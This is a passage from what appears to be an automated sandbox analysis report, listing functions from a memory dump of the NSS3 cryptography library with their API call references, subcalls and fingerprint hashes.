Instruction Fuzzy Hash: 0041B1B0B412018FDB50DFA9CC8479A7BE4AF48318F11416EDC19DBB46E774D885CB96

Function 6C613FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C613FF2

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaMark_Util.NSS3(?), ref: 6C614001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C61400F

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C614054

Part of subcall function 6C5ABB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C5ABC24
Part of subcall function 6C5ABB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5ABC39
Part of subcall function 6C5ABB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C5ABC58
Part of subcall function 6C5ABB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C5ABCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C614070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C6140CD

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 0b4d19bd88e8dcae8593dcaf0a842cddf2e68408bb5c27bc666ef3183d602af7
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: 10312B71E043459BEB008F699D81BBB3364AF9170DF144224FD09ABB42F772E9988299

Function 6C5B2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C5A2D1A), ref: 6C5B2E7E

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

PR_Now.NSS3 ref: 6C5B2EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C5B2EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C5A2D1A), ref: 6C5B2F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C5A2D1A), ref: 6C5B2F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C5B2F81

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: a863f1c7af0060fabae269d793bbd443a84b90464c0a487bada85af33cefef4e
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 9031287150110087F714C656CCAABBF76A5EF81318F644A79D42DB7ED0EB319846CA31

Function 6C5A0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C5A0A2C), ref: 6C5A0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C5A0A2C), ref: 6C5A0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C5A0A2C), ref: 6C5A0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C5A0A2C), ref: 6C5A0E90
free.MOZGLUE(00000000), ref: 6C5A0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C5A0A2C), ref: 6C5A0ED9

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 15bbf20bb7e1d2aa333bd883b9b15741df13e3f5a58930ce797d1d46b37b2f64
Instruction ID: bbc7685c7d174cce26868485422da837b8ae7344d7cf7968e57ba096cbec1920
Opcode Fuzzy Hash: 15bbf20bb7e1d2aa333bd883b9b15741df13e3f5a58930ce797d1d46b37b2f64
Instruction Fuzzy Hash: 8C213172F102845BEB1086E75C45B6F76AEDBC1748F150437D91B63B01EA61D81792B1

Function 6C5AAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5AAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C5AAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5AAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C5AAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C6C9500), ref: 6C5AAF23

Part of subcall function 6C5FF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C5FF0C8
Part of subcall function 6C5FF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5FF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AAF37

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 12c8e10017bee5c831bb8896b31c7905faa4a5777c77b67d6f3a0dffd8d6c823
Instruction ID: fba4b8480bca4fa3f77cb2bb92c6a1a56194af8f56db3c857b447f3cc2331fdd
Opcode Fuzzy Hash: 12c8e10017bee5c831bb8896b31c7905faa4a5777c77b67d6f3a0dffd8d6c823
Instruction Fuzzy Hash: A7213C75509200ABE7108E599C41B5E7BE4AFC572CF144314FC649B781E731D5068BAB

Function 6C62EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C62EE85
realloc.MOZGLUE(ACC204B4,?), ref: 6C62EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C62EEC5

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

htonl.WSOCK32(?), ref: 6C62EEE3
htonl.WSOCK32(00000000,?), ref: 6C62EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C62EF01

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: b8b7625b52b450ac689568ce29466bafa23d9e773666896fc9ecf9ecf29d133c
Instruction ID: ff4b0e532f06f8f7d9577cc66dad238a1c0574009543d48c1b7203539976091a
Opcode Fuzzy Hash: b8b7625b52b450ac689568ce29466bafa23d9e773666896fc9ecf9ecf29d133c
Instruction Fuzzy Hash: 8A21D371A002149FCB109F38DC8079A7BA8EF49359F148179EC59AB651E335EC15CBEA

Function 6C5DEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5DEE49

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5DEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C5DEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C5DEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5DEEB3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 633a20da0557a211713dc698643ff6628f666a897f1eb1a9d2fa1e8a994e6262
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 5821C3B6A00311ABEB118B58DC81EABB7A8EB45708F050164FE14DB741E7B1EC15C7F1

Function 6C5A7F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5A7F68

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C5A7F7B

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A7FA7

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6C919C,?), ref: 6C5A7FBB

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5A7FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C6C915C,00000014), ref: 6C5A7FFE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: 8794048bdab71f77e3d351cc455fef09ffaa61775cd2fa6bf5466fc4e4709716
Instruction ID: ae1d9ef5f7040048ae42f8df34c4c8674dfbe384676c836fe89a9337a6d9d487
Opcode Fuzzy Hash: 8794048bdab71f77e3d351cc455fef09ffaa61775cd2fa6bf5466fc4e4709716
Instruction Fuzzy Hash: B9113A71E0020497F7149A669D41BBB77FCDF4968CF00062DFC69D2B42F720AA49C6BA

Function 6C5ABE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6C62DC29,?), ref: 6C5ABE64

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C62DC29,?), ref: 6C5ABE78

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C62DC29,?), ref: 6C5ABE96

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C62DC29,?), ref: 6C5ABEBB

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6C62DC29,?), ref: 6C5ABEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C62DC29,?), ref: 6C5ABEF3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: a610a2f885dbf6b078156250c5b9befafe6eba77ee912bbf833f40154035b8c9
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: 7A11B771F002099BEB049BA59D41FAF3BA8EF41258F144428ED09EB781EB31D91AC7F5

Function 6C633C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C633D3F

Part of subcall function 6C5ABA90: PORT_NewArena_Util.NSS3(00000800,6C633CAF,?), ref: 6C5ABABF
Part of subcall function 6C5ABA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C633CAF,?), ref: 6C5ABAD5
Part of subcall function 6C5ABA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C633CAF,?), ref: 6C5ABB08
Part of subcall function 6C5ABA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C633CAF,?), ref: 6C5ABB1A
Part of subcall function 6C5ABA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C633CAF,?), ref: 6C5ABB3B

PR_EnterMonitor.NSS3(?), ref: 6C633CCB

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

PR_EnterMonitor.NSS3(?), ref: 6C633CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C633CF8
PR_ExitMonitor.NSS3(?), ref: 6C633D15
PR_ExitMonitor.NSS3(?), ref: 6C633D2E

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: 2e60b07794fc639a95635cfcac38f504d2e4efc66620fa0ab2863675664e4d33
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 981108B56106106FE7215F66FC4279BB2E4EF5230CF507538E80E87B20E632E81AC65E

Function 6C5FFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C5FFE08

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C5FFE1D

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C5FFE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C5FFE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C5FFE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6C5FFE6F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 41b76b8e47752896a26b99c0cd1980a5c7088e5f29d56c418c69e9b2bf97bab4
Instruction ID: 6f2d0ab1e1e61758232bc4d40ac77f4a37fe799529e176f9e69619a1d5678683
Opcode Fuzzy Hash: 41b76b8e47752896a26b99c0cd1980a5c7088e5f29d56c418c69e9b2bf97bab4
Instruction Fuzzy Hash: 591125B7A00201ABEB048F54DC40A5B77D8AF15299F108634EA3997F12E731E915CBA9

Function 6C6AFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C6AFD9E

Part of subcall function 6C669BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C591A48), ref: 6C669BB3
Part of subcall function 6C669BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C591A48), ref: 6C669BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C6AFDB9

Part of subcall function 6C58A900: TlsGetValue.KERNEL32(00000000,?,6C7014E4,?,6C524DD9), ref: 6C58A90F
Part of subcall function 6C58A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C58A94F

PR_Unlock.NSS3 ref: 6C6AFDD4
PR_Lock.NSS3 ref: 6C6AFDF2
PR_NotifyAllCondVar.NSS3 ref: 6C6AFE0D
PR_Unlock.NSS3 ref: 6C6AFE23

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
